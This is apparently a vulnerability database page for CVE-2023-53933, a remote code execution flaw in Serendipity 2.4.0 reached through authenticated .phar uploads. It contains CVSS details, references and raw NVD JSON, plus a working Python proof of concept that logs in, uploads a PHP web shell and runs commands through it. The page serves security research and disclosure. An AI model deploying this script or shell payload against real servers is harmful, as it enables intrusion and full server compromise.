CVE-2023-53933

Description

Serendipity 2.4.0 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files with .phar extension. Attackers can upload files with system command payloads to the media upload endpoint and execute arbitrary commands on the server.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:s9y:serendipity:2.4.0:-:*:*:*:*:*:* - VULNERABLE

Serendipity 2.4.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2023-53933 PoC - Serendipity 2.4.0 Authenticated RCE via .phar upload

target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com/serendipity'
username = 'attacker'
password = 'password'

session = requests.Session()

# Step 1: Login
login_url = f'{target}/serendipity_admin.php'
login_data = {'serendipity[user]': username, 'serendipity[pass]': password}
resp = session.post(login_url, data=login_data)

# Step 2: Upload malicious .phar file
upload_url = f'{target}/serendipity_admin.php?adminModule=media'

# PHP payload: system($_GET['cmd'])
payload = b'<?php system($_GET["cmd"]); ?>'
files = {'serendipity[userfile]': ('shell.phar', payload, 'application/octet-stream')}
resp = session.post(upload_url, files=files)

# Step 3: Extract uploaded file path from response and execute command
if 'upload' in resp.text.lower() or resp.status_code == 200:
    print('[+] File uploaded successfully')
    # Access the uploaded file to execute commands
    cmd = 'whoami'
    shell_url = f'{target}/uploads/shell.phar?cmd={cmd}'
    rce_resp = session.get(shell_url)
    print(f'[+] Command output: {rce_resp.text}')

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53933
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53933
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53933/
[4] VulDB https://vuldb.com/cve/CVE-2023-53933
[5] https://docs.s9y.org/
[6] https://www.exploit-db.com/exploits/51372
[7] https://www.vulncheck.com/advisories/serendipity-authenticated-remote-code-execution-via-file-upload
[8] https://www.exploit-db.com/exploits/51372

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53933", "sourceIdentifier": "[email protected]", "published": "2025-12-17T23:15:52.973", "lastModified": "2025-12-24T16:52:17.043", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Serendipity 2.4.0 contains a remote code execution vulnerability that allows authenticated attackers to upload malicious PHP files with .phar extension. Attackers can upload files with system command payloads to the media upload endpoint and execute arbitrary commands on the server."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:s9y:serendipity:2.4.0:-:*:*:*:*:*:*", "matchCriteriaId": "25D8382D-2719-4885-929B-E82FC7BFE6B9"}]}]}], "references": [{"url": "https://docs.s9y.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51372", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/serendipity-authenticated-remote-code-execution-via-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory", "Exploit"]}, {"url": "https://www.exploit-db.com/exploits/51372", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}